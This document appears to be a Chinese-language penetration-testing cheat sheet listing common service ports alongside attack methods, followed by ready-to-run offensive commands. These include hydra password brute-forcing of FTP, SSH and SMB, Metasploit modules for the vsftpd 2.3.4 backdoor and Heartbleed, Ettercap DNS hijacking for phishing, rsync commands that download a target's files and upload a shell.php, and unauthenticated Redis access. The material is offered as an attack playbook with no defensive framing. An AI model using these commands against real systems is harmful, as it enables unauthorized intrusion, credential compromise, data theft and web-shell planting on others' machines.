端口 | 说明 | 攻击方法 |
---|---|---|
21 | FTP-文件传输协议 | 弱口令、爆破、嗅探、后门 |
22 | ssh-安全隧道远程登陆 | 弱口令、爆破 |
23 | telnet-远程连接 | 弱口令、爆破、嗅探 |
25 | smtp-简单邮件传输协议 | 邮件伪造 |
53 | domain-DNS域名解析服务 | DNS劫持、缓存投毒 |
80/443 | http服务 | 常见Web漏洞、IIS写文件、OpenSSL |
139 | Samba服务 | 爆破、远程代码执行 |
445 | 局域网共享 | ms-17010漏洞(Win7及之前版本) |
873 | Rsync | 远程代码执行 |
1433 | MSSQL数据库 | 爆破、SQL注入 |
2049 | NFS | 未授权访问 |
3306 | MySQL数据库 | 爆破、SQL注入 |
3389 | rdp-远程桌面连接 | 爆破、漏洞ms12-020等 |
5432 | postgresql | 爆破、注入 |
5632 | Pcanywhere | 拒绝服务等漏洞、爆破 |
5900 | VNC远程登陆 | 爆破、认证绕过 |
6379 | Redis | 未授权访问 |
7001/7002 | weblogic | Java反序列化漏洞 |
9990 | jboss | 远程代码执行、Java反序列化 |
攻击方向
21(FTP)
默认端口:20(数据端口);21(控制端口);69(tftp小型文件传输协议)
爆破:
#anonymous匿名登陆
#弱口令 用户名:FTP 密码:FTP或为空或爆破
hydra -l FTP -P top10000.txt ftp://192.168.115.136
嗅探:
Ettercap(内网神器)
或msf模块
use auxiliary/sniffer/psnuffle
在特定版本的vsftpd服务器中,被人恶意植入代码,当用户名以”:)”为结尾
服务器就会在6200端口监听,并且能够执行任意代码(root)
use exploit/unix/ftp/vsftpd_234_backdoor
22(SSH)
爆破:
#可以采用上边那种或以下这种写法
hydra -l root -P top10000.txt 192.168.115.136 ssh -v
53(DNS)
内网使用Ettercap进行DNS劫持,钓鱼攻击
公网的话要能控制运营商网关
139(Smb)
爆破:
hydra -l root -P top10000.txt 192.168.115.136 smb -v
远程代码执行:
443(https)
检测:
nmap -sV -p 8443 --script ssl-heartbleed 192.168.115.136
利用:
use auxiliary/scanner/ssl/openssl_heartbleed
873(Rsync)
未授权访问:
rsync -avz ip::wwwroot/目录 /root/ #下载目标主机上的文件到本机root目录
rsync -avz shell.php 192.168.3.xxx::wwwroot #上传文件
2049(NFS)
列出导出文件夹:
use auxiliary/scanner/nfs/nfsmount
6379(Redis)
未授权访问:
#没有密码,直接连接
redis-cli -h 192.168.115.136
#Redis命令
>info #查看主机信息
7001/7002(weblogic)
反序列化:CVE-2017-3248